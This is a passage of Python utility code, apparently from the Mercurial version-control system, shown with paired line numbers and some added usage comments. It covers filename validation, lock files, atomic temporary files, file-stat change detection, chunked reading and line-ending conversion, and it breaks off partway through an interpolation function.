1824 1826 >>> checkwinfilename(b"foo\\/bar")
1825 1827 "directory name ends with '\\', which is invalid on Windows"
1826 1828 '''
1827 1829 if path.endswith('\\'):
1828 1830 return _("filename ends with '\\', which is invalid on Windows")
1829 1831 if '\\/' in path:
1830 1832 return _("directory name ends with '\\', which is invalid on Windows")
1831 1833 for n in path.replace('\\', '/').split('/'):
1832 1834 if not n:
1833 1835 continue
1834 1836 for c in _filenamebytestr(n):
1835 1837 if c in _winreservedchars:
1836 1838 return _("filename contains '%s', which is reserved "
1837 1839 "on Windows") % c
1838 1840 if ord(c) <= 31:
1839 1841 return _("filename contains '%s', which is invalid "
1840 1842 "on Windows") % stringutil.escapestr(c)
1841 1843 base = n.split('.')[0]
1842 1844 if base and base.lower() in _winreservednames:
1843 1845 return _("filename contains '%s', which is reserved "
1844 1846 "on Windows") % base
1845 1847 t = n[-1:]
1846 1848 if t in '. ' and n not in '..':
1847 1849 return _("filename ends with '%s', which is not allowed "
1848 1850 "on Windows") % t
1849 1851
1850 1852 if pycompat.iswindows:
1851 1853 checkosfilename = checkwinfilename
1852 1854 timer = time.clock
1853 1855 else:
1854 1856 checkosfilename = platform.checkosfilename
1855 1857 timer = time.time
1856 1858
1857 1859 if safehasattr(time, "perf_counter"):
1858 1860 timer = time.perf_counter
1859 1861
1860 1862 def makelock(info, pathname):
1861 1863 """Create a lock file atomically if possible
1862 1864
1863 1865 This may leave a stale lock file if symlink isn't supported and signal
1864 1866 interrupt is enabled.
1865 1867 """
1866 1868 try:
1867 1869 return os.symlink(info, pathname)
1868 1870 except OSError as why:
1869 1871 if why.errno == errno.EEXIST:
1870 1872 raise
1871 1873 except AttributeError: # no symlink in os
1872 1874 pass
1873 1875
1874 1876 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1875 1877 ld = os.open(pathname, flags)
1876 1878 os.write(ld, info)
1877 1879 os.close(ld)
1878 1880
1879 1881 def readlock(pathname):
1880 1882 try:
1881 1883 return readlink(pathname)
1882 1884 except OSError as why:
1883 1885 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1884 1886 raise
1885 1887 except AttributeError: # no symlink in os
1886 1888 pass
1887 1889 with posixfile(pathname, 'rb') as fp:
1888 1890 return fp.read()
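
# Sketch of the round trip when symlinks are available: makelock() stores
# the lock info as the target of a dangling symlink, and readlock()
# recovers it without following the link (values are hypothetical):
#
#   makelock(b'myhost:12345', b'.hg/store/lock')
#   readlock(b'.hg/store/lock')  # -> b'myhost:12345'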
1889 1891
1890 1892 def fstat(fp):
1891 1893 '''stat file object that may not have fileno method.'''
1892 1894 try:
1893 1895 return os.fstat(fp.fileno())
1894 1896 except AttributeError:
1895 1897 return os.stat(fp.name)
1896 1898
1897 1899 # File system features
1898 1900
1899 1901 def fscasesensitive(path):
1900 1902 """
1901 1903 Return true if the given path is on a case-sensitive filesystem
1902 1904
1903 1905 Requires a path (like /foo/.hg) ending with a foldable final
1904 1906 directory component.
1905 1907 """
1906 1908 s1 = os.lstat(path)
1907 1909 d, b = os.path.split(path)
1908 1910 b2 = b.upper()
1909 1911 if b == b2:
1910 1912 b2 = b.lower()
1911 1913 if b == b2:
1912 1914 return True # no evidence against case sensitivity
1913 1915 p2 = os.path.join(d, b2)
1914 1916 try:
1915 1917 s2 = os.lstat(p2)
1916 1918 if s2 == s1:
1917 1919 return False
1918 1920 return True
1919 1921 except OSError:
1920 1922 return True
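
# The probe in short: lstat the path, flip the case of its final
# component, and lstat again; identical results mean both names resolve
# to the same file, i.e. the filesystem folds case. For a hypothetical
# path:
#
#   fscasesensitive(b'/repo/.hg')  # compares lstat of '.hg' and '.HG'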
1921 1923
1922 1924 try:
1923 1925 import re2
1924 1926 _re2 = None
1925 1927 except ImportError:
1926 1928 _re2 = False
1927 1929
1928 1930 class _re(object):
1929 1931 def _checkre2(self):
1930 1932 global _re2
1931 1933 try:
1932 1934 # check if match works, see issue3964
1933 1935 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1934 1936 except ImportError:
1935 1937 _re2 = False
1936 1938
1937 1939 def compile(self, pat, flags=0):
1938 1940 '''Compile a regular expression, using re2 if possible
1939 1941
1940 1942 For best performance, use only re2-compatible regexp features. The
1941 1943 only flags from the re module that are re2-compatible are
1942 1944 IGNORECASE and MULTILINE.'''
1943 1945 if _re2 is None:
1944 1946 self._checkre2()
1945 1947 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1946 1948 if flags & remod.IGNORECASE:
1947 1949 pat = '(?i)' + pat
1948 1950 if flags & remod.MULTILINE:
1949 1951 pat = '(?m)' + pat
1950 1952 try:
1951 1953 return re2.compile(pat)
1952 1954 except re2.error:
1953 1955 pass
1954 1956 return remod.compile(pat, flags)
1955 1957
1956 1958 @propertycache
1957 1959 def escape(self):
1958 1960 '''Return the version of escape corresponding to self.compile.
1959 1961
1960 1962 This is imperfect because whether re2 or re is used for a particular
1961 1963 function depends on the flags, etc, but it's the best we can do.
1962 1964 '''
1963 1965 global _re2
1964 1966 if _re2 is None:
1965 1967 self._checkre2()
1966 1968 if _re2:
1967 1969 return re2.escape
1968 1970 else:
1969 1971 return remod.escape
1970 1972
1971 1973 re = _re()
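
# Callers use this instance the way they would a regexp module; whether
# re2 is actually picked remains an internal detail, e.g.:
#
#   pat = re.compile(br'^[a-z]+$', remod.IGNORECASE)
#   pat.match(b'Heads')  # matches, with either engine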
1972 1974
1973 1975 _fspathcache = {}
1974 1976 def fspath(name, root):
1975 1977 '''Get name in the case stored in the filesystem
1976 1978
1977 1979 The name should be relative to root, and be normcase-ed for efficiency.
1978 1980
1979 1981 Note that this function is unnecessary, and should not be
1980 1982 called, for case-sensitive filesystems (simply because it's expensive).
1981 1983
1982 1984 The root should be normcase-ed, too.
1983 1985 '''
1984 1986 def _makefspathcacheentry(dir):
1985 1987 return dict((normcase(n), n) for n in os.listdir(dir))
1986 1988
1987 1989 seps = pycompat.ossep
1988 1990 if pycompat.osaltsep:
1989 1991 seps = seps + pycompat.osaltsep
1990 1992 # Protect backslashes. This gets silly very quickly.
1991 1993 seps = seps.replace('\\', '\\\\')
1992 1994 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1993 1995 dir = os.path.normpath(root)
1994 1996 result = []
1995 1997 for part, sep in pattern.findall(name):
1996 1998 if sep:
1997 1999 result.append(sep)
1998 2000 continue
1999 2001
2000 2002 if dir not in _fspathcache:
2001 2003 _fspathcache[dir] = _makefspathcacheentry(dir)
2002 2004 contents = _fspathcache[dir]
2003 2005
2004 2006 found = contents.get(part)
2005 2007 if not found:
2006 2008 # retry "once per directory" per "dirstate.walk" which
2007 2009 # may take place for each patch of "hg qpush", for example
2008 2010 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
2009 2011 found = contents.get(part)
2010 2012
2011 2013 result.append(found or part)
2012 2014 dir = os.path.join(dir, part)
2013 2015
2014 2016 return ''.join(result)
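
# Sketch on a case-insensitive filesystem where the on-disk tree contains
# 'Foo/Bar.txt' (a hypothetical layout); both arguments must already be
# normcase-ed:
#
#   fspath(b'foo/bar.txt', b'/repo')  # -> b'Foo/Bar.txt'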
2015 2017
2016 2018 def checknlink(testfile):
2017 2019 '''check whether hardlink count reporting works properly'''
2018 2020
2019 2021 # testfile may be open, so we need a separate file for checking to
2020 2022 # work around issue2543 (or testfile may get lost on Samba shares)
2021 2023 f1, f2, fp = None, None, None
2022 2024 try:
2023 2025 fd, f1 = pycompat.mkstemp(prefix='.%s-' % os.path.basename(testfile),
2024 2026 suffix='1~', dir=os.path.dirname(testfile))
2025 2027 os.close(fd)
2026 2028 f2 = '%s2~' % f1[:-2]
2027 2029
2028 2030 oslink(f1, f2)
2029 2031 # nlinks() may behave differently for files on Windows shares if
2030 2032 # the file is open.
2031 2033 fp = posixfile(f2)
2032 2034 return nlinks(f2) > 1
2033 2035 except OSError:
2034 2036 return False
2035 2037 finally:
2036 2038 if fp is not None:
2037 2039 fp.close()
2038 2040 for f in (f1, f2):
2039 2041 try:
2040 2042 if f is not None:
2041 2043 os.unlink(f)
2042 2044 except OSError:
2043 2045 pass
2044 2046
2045 2047 def endswithsep(path):
2046 2048 '''Check path ends with os.sep or os.altsep.'''
2047 2049 return (path.endswith(pycompat.ossep)
2048 2050 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
2049 2051
2050 2052 def splitpath(path):
2051 2053 '''Split path by os.sep.
2052 2054 Note that this function does not use os.altsep because this is
2053 2055 an alternative to a simple "xxx.split(os.sep)".
2054 2056 It is recommended to use os.path.normpath() before using this
2055 2057 function if needed.'''
2056 2058 return path.split(pycompat.ossep)
2057 2059
2058 2060 def mktempcopy(name, emptyok=False, createmode=None, enforcewritable=False):
2059 2061 """Create a temporary file with the same contents from name
2060 2062
2061 2063 The permission bits are copied from the original file.
2062 2064
2063 2065 If the temporary file is going to be truncated immediately, you
2064 2066 can use emptyok=True as an optimization.
2065 2067
2066 2068 Returns the name of the temporary file.
2067 2069 """
2068 2070 d, fn = os.path.split(name)
2069 2071 fd, temp = pycompat.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
2070 2072 os.close(fd)
2071 2073 # Temporary files are created with mode 0600, which is usually not
2072 2074 # what we want. If the original file already exists, just copy
2073 2075 # its mode. Otherwise, manually obey umask.
2074 2076 copymode(name, temp, createmode, enforcewritable)
2075 2077
2076 2078 if emptyok:
2077 2079 return temp
2078 2080 try:
2079 2081 try:
2080 2082 ifp = posixfile(name, "rb")
2081 2083 except IOError as inst:
2082 2084 if inst.errno == errno.ENOENT:
2083 2085 return temp
2084 2086 if not getattr(inst, 'filename', None):
2085 2087 inst.filename = name
2086 2088 raise
2087 2089 ofp = posixfile(temp, "wb")
2088 2090 for chunk in filechunkiter(ifp):
2089 2091 ofp.write(chunk)
2090 2092 ifp.close()
2091 2093 ofp.close()
2092 2094 except: # re-raises
2093 2095 try:
2094 2096 os.unlink(temp)
2095 2097 except OSError:
2096 2098 pass
2097 2099 raise
2098 2100 return temp
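
# Design note: the temporary file is created in the same directory as
# 'name', so the eventual rename() stays on one filesystem and therefore
# remains atomic; this is the building block atomictempfile relies on.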
2099 2101
2100 2102 class filestat(object):
2101 2103 """help to exactly detect change of a file
2102 2104
2103 2105 The 'stat' attribute is the result of 'os.stat()' if the specified
2104 2106 'path' exists; otherwise it is None. This saves callers of this
2105 2107 class a preparatory 'exists()' check.
2106 2108 """
2107 2109 def __init__(self, stat):
2108 2110 self.stat = stat
2109 2111
2110 2112 @classmethod
2111 2113 def frompath(cls, path):
2112 2114 try:
2113 2115 stat = os.stat(path)
2114 2116 except OSError as err:
2115 2117 if err.errno != errno.ENOENT:
2116 2118 raise
2117 2119 stat = None
2118 2120 return cls(stat)
2119 2121
2120 2122 @classmethod
2121 2123 def fromfp(cls, fp):
2122 2124 stat = os.fstat(fp.fileno())
2123 2125 return cls(stat)
2124 2126
2125 2127 __hash__ = object.__hash__
2126 2128
2127 2129 def __eq__(self, old):
2128 2130 try:
2129 2131 # if ambiguity between stat of new and old file is
2130 2132 # avoided, comparison of size, ctime and mtime is enough
2131 2133 # to exactly detect change of a file regardless of platform
2132 2134 return (self.stat.st_size == old.stat.st_size and
2133 2135 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
2134 2136 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
2135 2137 except AttributeError:
2136 2138 pass
2137 2139 try:
2138 2140 return self.stat is None and old.stat is None
2139 2141 except AttributeError:
2140 2142 return False
2141 2143
2142 2144 def isambig(self, old):
2143 2145 """Examine whether new (= self) stat is ambiguous against old one
2144 2146
2145 2147 "S[N]" below means stat of a file at N-th change:
2146 2148
2147 2149 - S[n-1].ctime < S[n].ctime: can detect change of a file
2148 2150 - S[n-1].ctime == S[n].ctime
2149 2151 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2150 2152 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2151 2153 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2152 2154 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2153 2155
2154 2156 Case (*2) above means that a file was changed twice or more
2155 2157 within the same second (= S[n-1].ctime), so comparing timestamps
2156 2158 is ambiguous.
2157 2159
2158 2160 The basic idea to avoid such ambiguity is "advance mtime by 1 sec
2159 2161 if the timestamp is ambiguous".
2160 2162
2161 2163 But advancing mtime only in case (*2) doesn't work as
2162 2164 expected, because naturally advanced S[n].mtime in case (*1)
2163 2165 might be equal to manually advanced S[n-1 or earlier].mtime.
2164 2166
2165 2167 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2166 2168 treated as ambiguous regardless of mtime, to avoid changes being
2167 2169 overlooked due to collisions between such mtimes.
2168 2170
2169 2171 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2170 2172 S[n].mtime", even if size of a file isn't changed.
2171 2173 """
2172 2174 try:
2173 2175 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2174 2176 except AttributeError:
2175 2177 return False
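
# Worked example: a file is rewritten twice within the same second, so
# S[n-1].ctime == S[n].ctime while the size happens to match; __eq__
# above would call the file unchanged. isambig() flags exactly this
# case, and the caller then bumps mtime to (mtime + 1) & 0x7fffffff so
# that the next comparison can tell the two states apart.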
2176 2178
2177 2179 def avoidambig(self, path, old):
2178 2180 """Change file stat of specified path to avoid ambiguity
2179 2181
2180 2182 'old' should be previous filestat of 'path'.
2181 2183
2182 2184 This skips avoiding ambiguity, if a process doesn't have
2183 2185 appropriate privileges for 'path'. This returns False in this
2184 2186 case.
2185 2187
2186 2188 Otherwise, this returns True, as "ambiguity is avoided".
2187 2189 """
2188 2190 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2189 2191 try:
2190 2192 os.utime(path, (advanced, advanced))
2191 2193 except OSError as inst:
2192 2194 if inst.errno == errno.EPERM:
2193 2195 # utime() on the file created by another user causes EPERM,
2194 2196 # if a process doesn't have appropriate privileges
2195 2197 return False
2196 2198 raise
2197 2199 return True
2198 2200
2199 2201 def __ne__(self, other):
2200 2202 return not self == other
2201 2203
2202 2204 class atomictempfile(object):
2203 2205 '''writable file object that atomically updates a file
2204 2206
2205 2207 All writes will go to a temporary copy of the original file. Call
2206 2208 close() when you are done writing, and atomictempfile will rename
2207 2209 the temporary copy to the original name, making the changes
2208 2210 visible. If the object is destroyed without being closed, all your
2209 2211 writes are discarded.
2210 2212
2211 2213 checkambig argument of constructor is used with filestat, and is
2212 2214 useful only if target file is guarded by any lock (e.g. repo.lock
2213 2215 or repo.wlock).
2214 2216 '''
2215 2217 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2216 2218 self.__name = name # permanent name
2217 2219 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2218 2220 createmode=createmode,
2219 2221 enforcewritable=('w' in mode))
2220 2222
2221 2223 self._fp = posixfile(self._tempname, mode)
2222 2224 self._checkambig = checkambig
2223 2225
2224 2226 # delegated methods
2225 2227 self.read = self._fp.read
2226 2228 self.write = self._fp.write
2227 2229 self.seek = self._fp.seek
2228 2230 self.tell = self._fp.tell
2229 2231 self.fileno = self._fp.fileno
2230 2232
2231 2233 def close(self):
2232 2234 if not self._fp.closed:
2233 2235 self._fp.close()
2234 2236 filename = localpath(self.__name)
2235 2237 oldstat = self._checkambig and filestat.frompath(filename)
2236 2238 if oldstat and oldstat.stat:
2237 2239 rename(self._tempname, filename)
2238 2240 newstat = filestat.frompath(filename)
2239 2241 if newstat.isambig(oldstat):
2240 2242 # stat of changed file is ambiguous to original one
2241 2243 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2242 2244 os.utime(filename, (advanced, advanced))
2243 2245 else:
2244 2246 rename(self._tempname, filename)
2245 2247
2246 2248 def discard(self):
2247 2249 if not self._fp.closed:
2248 2250 try:
2249 2251 os.unlink(self._tempname)
2250 2252 except OSError:
2251 2253 pass
2252 2254 self._fp.close()
2253 2255
2254 2256 def __del__(self):
2255 2257 if safehasattr(self, '_fp'): # constructor actually did something
2256 2258 self.discard()
2257 2259
2258 2260 def __enter__(self):
2259 2261 return self
2260 2262
2261 2263 def __exit__(self, exctype, excvalue, traceback):
2262 2264 if exctype is not None:
2263 2265 self.discard()
2264 2266 else:
2265 2267 self.close()
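
# Canonical usage is as a context manager; the rename happens only on a
# clean exit (hypothetical path and content):
#
#   with atomictempfile(b'.hg/requires', 'wb') as fp:
#       fp.write(b'revlogv1\n')
#   # readers never observe a half-written 'requires' file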
2266 2268
2267 2269 def unlinkpath(f, ignoremissing=False, rmdir=True):
2268 2270 """unlink and remove the directory if it is empty"""
2269 2271 if ignoremissing:
2270 2272 tryunlink(f)
2271 2273 else:
2272 2274 unlink(f)
2273 2275 if rmdir:
2274 2276 # try removing directories that might now be empty
2275 2277 try:
2276 2278 removedirs(os.path.dirname(f))
2277 2279 except OSError:
2278 2280 pass
2279 2281
2280 2282 def tryunlink(f):
2281 2283 """Attempt to remove a file, ignoring ENOENT errors."""
2282 2284 try:
2283 2285 unlink(f)
2284 2286 except OSError as e:
2285 2287 if e.errno != errno.ENOENT:
2286 2288 raise
2287 2289
2288 2290 def makedirs(name, mode=None, notindexed=False):
2289 2291 """recursive directory creation with parent mode inheritance
2290 2292
2291 2293 Newly created directories are marked as "not to be indexed by
2292 2294 the content indexing service", if ``notindexed`` is specified
2293 2295 for "write" mode access.
2294 2296 """
2295 2297 try:
2296 2298 makedir(name, notindexed)
2297 2299 except OSError as err:
2298 2300 if err.errno == errno.EEXIST:
2299 2301 return
2300 2302 if err.errno != errno.ENOENT or not name:
2301 2303 raise
2302 2304 parent = os.path.dirname(os.path.abspath(name))
2303 2305 if parent == name:
2304 2306 raise
2305 2307 makedirs(parent, mode, notindexed)
2306 2308 try:
2307 2309 makedir(name, notindexed)
2308 2310 except OSError as err:
2309 2311 # Catch EEXIST to handle races
2310 2312 if err.errno == errno.EEXIST:
2311 2313 return
2312 2314 raise
2313 2315 if mode is not None:
2314 2316 os.chmod(name, mode)
2315 2317
2316 2318 def readfile(path):
2317 2319 with open(path, 'rb') as fp:
2318 2320 return fp.read()
2319 2321
2320 2322 def writefile(path, text):
2321 2323 with open(path, 'wb') as fp:
2322 2324 fp.write(text)
2323 2325
2324 2326 def appendfile(path, text):
2325 2327 with open(path, 'ab') as fp:
2326 2328 fp.write(text)
2327 2329
2328 2330 class chunkbuffer(object):
2329 2331 """Allow arbitrary sized chunks of data to be efficiently read from an
2330 2332 iterator over chunks of arbitrary size."""
2331 2333
2332 2334 def __init__(self, in_iter):
2333 2335 """in_iter is the iterator that's iterating over the input chunks."""
2334 2336 def splitbig(chunks):
2335 2337 for chunk in chunks:
2336 2338 if len(chunk) > 2**20:
2337 2339 pos = 0
2338 2340 while pos < len(chunk):
2339 2341 end = pos + 2 ** 18
2340 2342 yield chunk[pos:end]
2341 2343 pos = end
2342 2344 else:
2343 2345 yield chunk
2344 2346 self.iter = splitbig(in_iter)
2345 2347 self._queue = collections.deque()
2346 2348 self._chunkoffset = 0
2347 2349
2348 2350 def read(self, l=None):
2349 2351 """Read L bytes of data from the iterator of chunks of data.
2350 2352 Returns less than L bytes if the iterator runs dry.
2351 2353
2352 2354 If the size parameter is omitted, read everything"""
2353 2355 if l is None:
2354 2356 return ''.join(self.iter)
2355 2357
2356 2358 left = l
2357 2359 buf = []
2358 2360 queue = self._queue
2359 2361 while left > 0:
2360 2362 # refill the queue
2361 2363 if not queue:
2362 2364 target = 2**18
2363 2365 for chunk in self.iter:
2364 2366 queue.append(chunk)
2365 2367 target -= len(chunk)
2366 2368 if target <= 0:
2367 2369 break
2368 2370 if not queue:
2369 2371 break
2370 2372
2371 2373 # The easy way to do this would be to queue.popleft(), modify the
2372 2374 # chunk (if necessary), then queue.appendleft(). However, for cases
2373 2375 # where we read partial chunk content, this incurs 2 dequeue
2374 2376 # mutations and creates a new str for the remaining chunk in the
2375 2377 # queue. Our code below avoids this overhead.
2376 2378
2377 2379 chunk = queue[0]
2378 2380 chunkl = len(chunk)
2379 2381 offset = self._chunkoffset
2380 2382
2381 2383 # Use full chunk.
2382 2384 if offset == 0 and left >= chunkl:
2383 2385 left -= chunkl
2384 2386 queue.popleft()
2385 2387 buf.append(chunk)
2386 2388 # self._chunkoffset remains at 0.
2387 2389 continue
2388 2390
2389 2391 chunkremaining = chunkl - offset
2390 2392
2391 2393 # Use all of unconsumed part of chunk.
2392 2394 if left >= chunkremaining:
2393 2395 left -= chunkremaining
2394 2396 queue.popleft()
2395 2397 # offset == 0 is enabled by block above, so this won't merely
2396 2398 # copy via ``chunk[0:]``.
2397 2399 buf.append(chunk[offset:])
2398 2400 self._chunkoffset = 0
2399 2401
2400 2402 # Partial chunk needed.
2401 2403 else:
2402 2404 buf.append(chunk[offset:offset + left])
2403 2405 self._chunkoffset += left
2404 2406 left -= chunkremaining
2405 2407
2406 2408 return ''.join(buf)
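
# A sketch of the intended use: wrap an iterator of arbitrarily sized
# chunks and read fixed-size records from it.
#
#   buf = chunkbuffer(iter([b'ab', b'cdef', b'g']))
#   buf.read(3)  # -> b'abc'
#   buf.read(4)  # -> b'defg' (drains the remaining queued data)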
2407 2409
2408 2410 def filechunkiter(f, size=131072, limit=None):
2409 2411 """Create a generator that produces the data in the file size
2410 2412 (default 131072) bytes at a time, up to optional limit (default is
2411 2413 to read all data). Chunks may be less than size bytes if the
2412 2414 chunk is the last chunk in the file, or the file is a socket or
2413 2415 some other type of file that sometimes reads less data than is
2414 2416 requested."""
2415 2417 assert size >= 0
2416 2418 assert limit is None or limit >= 0
2417 2419 while True:
2418 2420 if limit is None:
2419 2421 nbytes = size
2420 2422 else:
2421 2423 nbytes = min(limit, size)
2422 2424 s = nbytes and f.read(nbytes)
2423 2425 if not s:
2424 2426 break
2425 2427 if limit:
2426 2428 limit -= len(s)
2427 2429 yield s
2428 2430
2429 2431 class cappedreader(object):
2430 2432 """A file object proxy that allows reading up to N bytes.
2431 2433
2432 2434 Given a source file object, instances of this type allow reading up to
2433 2435 N bytes from that source file object. Attempts to read past the allowed
2434 2436 limit are treated as EOF.
2435 2437
2436 2438 It is assumed that I/O is not performed on the original file object
2437 2439 in addition to I/O that is performed by this instance. If there is,
2438 2440 state tracking will get out of sync and unexpected results will ensue.
2439 2441 """
2440 2442 def __init__(self, fh, limit):
2441 2443 """Allow reading up to <limit> bytes from <fh>."""
2442 2444 self._fh = fh
2443 2445 self._left = limit
2444 2446
2445 2447 def read(self, n=-1):
2446 2448 if not self._left:
2447 2449 return b''
2448 2450
2449 2451 if n < 0:
2450 2452 n = self._left
2451 2453
2452 2454 data = self._fh.read(min(n, self._left))
2453 2455 self._left -= len(data)
2454 2456 assert self._left >= 0
2455 2457
2456 2458 return data
2457 2459
2458 2460 def readinto(self, b):
2459 2461 res = self.read(len(b))
2460 2462 if res is None:
2461 2463 return None
2462 2464
2463 2465 b[0:len(res)] = res
2464 2466 return len(res)
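
# Sketch: cap a reader at the first N bytes of an underlying stream.
#
#   capped = cappedreader(bytesio(b'0123456789'), 4)
#   capped.read(10)  # -> b'0123' (reads past the cap are truncated)
#   capped.read()    # -> b'' (the cap reads as EOF)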
2465 2467
2466 2468 def unitcountfn(*unittable):
2467 2469 '''return a function that renders a readable count of some quantity'''
2468 2470
2469 2471 def go(count):
2470 2472 for multiplier, divisor, format in unittable:
2471 2473 if abs(count) >= divisor * multiplier:
2472 2474 return format % (count / float(divisor))
2473 2475 return unittable[-1][2] % count
2474 2476
2475 2477 return go
2476 2478
2477 2479 def processlinerange(fromline, toline):
2478 2480 """Check that linerange <fromline>:<toline> makes sense and return a
2479 2481 0-based range.
2480 2482
2481 2483 >>> processlinerange(10, 20)
2482 2484 (9, 20)
2483 2485 >>> processlinerange(2, 1)
2484 2486 Traceback (most recent call last):
2485 2487 ...
2486 2488 ParseError: line range must be positive
2487 2489 >>> processlinerange(0, 5)
2488 2490 Traceback (most recent call last):
2489 2491 ...
2490 2492 ParseError: fromline must be strictly positive
2491 2493 """
2492 2494 if toline - fromline < 0:
2493 2495 raise error.ParseError(_("line range must be positive"))
2494 2496 if fromline < 1:
2495 2497 raise error.ParseError(_("fromline must be strictly positive"))
2496 2498 return fromline - 1, toline
2497 2499
2498 2500 bytecount = unitcountfn(
2499 2501 (100, 1 << 30, _('%.0f GB')),
2500 2502 (10, 1 << 30, _('%.1f GB')),
2501 2503 (1, 1 << 30, _('%.2f GB')),
2502 2504 (100, 1 << 20, _('%.0f MB')),
2503 2505 (10, 1 << 20, _('%.1f MB')),
2504 2506 (1, 1 << 20, _('%.2f MB')),
2505 2507 (100, 1 << 10, _('%.0f KB')),
2506 2508 (10, 1 << 10, _('%.1f KB')),
2507 2509 (1, 1 << 10, _('%.2f KB')),
2508 2510 (1, 1, _('%.0f bytes')),
2509 2511 )
2510 2512
2511 2513 class transformingwriter(object):
2512 2514 """Writable file wrapper to transform data by function"""
2513 2515
2514 2516 def __init__(self, fp, encode):
2515 2517 self._fp = fp
2516 2518 self._encode = encode
2517 2519
2518 2520 def close(self):
2519 2521 self._fp.close()
2520 2522
2521 2523 def flush(self):
2522 2524 self._fp.flush()
2523 2525
2524 2526 def write(self, data):
2525 2527 return self._fp.write(self._encode(data))
2526 2528
2527 2529 # Matches a single EOL which can either be a CRLF where repeated CR
2528 2530 # are removed or a LF. We do not care about old Macintosh files, so a
2529 2531 # stray CR is an error.
2530 2532 _eolre = remod.compile(br'\r*\n')
2531 2533
2532 2534 def tolf(s):
2533 2535 return _eolre.sub('\n', s)
2534 2536
2535 2537 def tocrlf(s):
2536 2538 return _eolre.sub('\r\n', s)
2537 2539
2538 2540 def _crlfwriter(fp):
2539 2541 return transformingwriter(fp, tocrlf)
2540 2542
2541 2543 if pycompat.oslinesep == '\r\n':
2542 2544 tonativeeol = tocrlf
2543 2545 fromnativeeol = tolf
2544 2546 nativeeolwriter = _crlfwriter
2545 2547 else:
2546 2548 tonativeeol = pycompat.identity
2547 2549 fromnativeeol = pycompat.identity
2548 2550 nativeeolwriter = pycompat.identity
2549 2551
2550 2552 if (pyplatform.python_implementation() == 'CPython' and
2551 2553 sys.version_info < (3, 0)):
2552 2554 # There is an issue in CPython that some IO methods do not handle EINTR
2553 2555 # correctly. The following table shows what CPython version (and functions)
2554 2556 # are affected (buggy: has the EINTR bug, okay: otherwise):
2555 2557 #
2556 2558 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2557 2559 # --------------------------------------------------
2558 2560 # fp.__iter__ | buggy | buggy | okay
2559 2561 # fp.read* | buggy | okay [1] | okay
2560 2562 #
2561 2563 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2562 2564 #
2563 2565 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2564 2566 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2565 2567 #
2566 2568 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2567 2569 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2568 2570 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2569 2571 # fp.__iter__ but not other fp.read* methods.
2570 2572 #
2571 2573 # On modern systems like Linux, the "read" syscall cannot be interrupted
2572 2574 # when reading "fast" files like on-disk files. So the EINTR issue only
2573 2575 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2574 2576 # files approximately as "fast" files and use the fast (unsafe) code path,
2575 2577 # to minimize the performance impact.
2576 2578 if sys.version_info >= (2, 7, 4):
2577 2579 # fp.readline deals with EINTR correctly, use it as a workaround.
2578 2580 def _safeiterfile(fp):
2579 2581 return iter(fp.readline, '')
2580 2582 else:
2581 2583 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2582 2584 # note: this may block longer than necessary because of bufsize.
2583 2585 def _safeiterfile(fp, bufsize=4096):
2584 2586 fd = fp.fileno()
2585 2587 line = ''
2586 2588 while True:
2587 2589 try:
2588 2590 buf = os.read(fd, bufsize)
2589 2591 except OSError as ex:
2590 2592 # os.read only raises EINTR before any data is read
2591 2593 if ex.errno == errno.EINTR:
2592 2594 continue
2593 2595 else:
2594 2596 raise
2595 2597 line += buf
2596 2598 if '\n' in buf:
2597 2599 splitted = line.splitlines(True)
2598 2600 line = ''
2599 2601 for l in splitted:
2600 2602 if l[-1] == '\n':
2601 2603 yield l
2602 2604 else:
2603 2605 line = l
2604 2606 if not buf:
2605 2607 break
2606 2608 if line:
2607 2609 yield line
2608 2610
2609 2611 def iterfile(fp):
2610 2612 fastpath = True
2611 2613 if type(fp) is file:
2612 2614 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2613 2615 if fastpath:
2614 2616 return fp
2615 2617 else:
2616 2618 return _safeiterfile(fp)
2617 2619 else:
2618 2620 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2619 2621 def iterfile(fp):
2620 2622 return fp
2621 2623
2622 2624 def iterlines(iterator):
2623 2625 for chunk in iterator:
2624 2626 for line in chunk.splitlines():
2625 2627 yield line
2626 2628
2627 2629 def expandpath(path):
2628 2630 return os.path.expanduser(os.path.expandvars(path))
2629 2631
2630 2632 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2631 2633 """Return the result of interpolating items in the mapping into string s.
2632 2634
2633 2635 prefix is a single character string, or a two character string with
2634 2636 a backslash as the first character if the prefix needs to be escaped in
2635 2637 a regular expression.
2636 2638
2637 2639 fn is an optional function that will be applied to the replacement text
2638 2640 just before replacement.
2639 2641
2640 2642 escape_prefix is an optional flag that allows using doubled prefix for
2641 2643 its escaping.
2642 2644 """
2643 2645 fn = fn or (lambda s: s)
2644 2646 patterns = '|'.join(mapping.keys())
2645 2647 if escape_prefix:
